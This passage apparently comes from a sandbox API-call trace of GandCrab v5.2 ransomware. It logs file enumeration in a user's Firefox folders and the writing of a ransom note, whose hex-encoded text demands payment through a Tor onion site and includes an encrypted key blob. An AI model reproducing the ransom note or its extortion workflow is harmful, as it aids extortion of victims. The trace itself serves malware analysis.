Reports\\d2ca4a09d2ca4deb61a.lock") returned 92 [0079.904] lstrlenW (lpString=".lock") returned 5 [0079.904] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.905] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.905] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.905] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.905] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.905] lstrcmpW (lpString1="events", lpString2=".") returned 1 [0079.905] lstrcmpW (lpString1="events", lpString2="..") returned 1 [0079.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="events" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" [0079.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\" [0079.905] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.905] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.905] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.906] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.906] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.906] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.906] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.906] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.906] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.906] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.906] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.906] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\\\TITWMVJL-DECRYPT.txt") returned 96 [0079.906] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0079.907] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f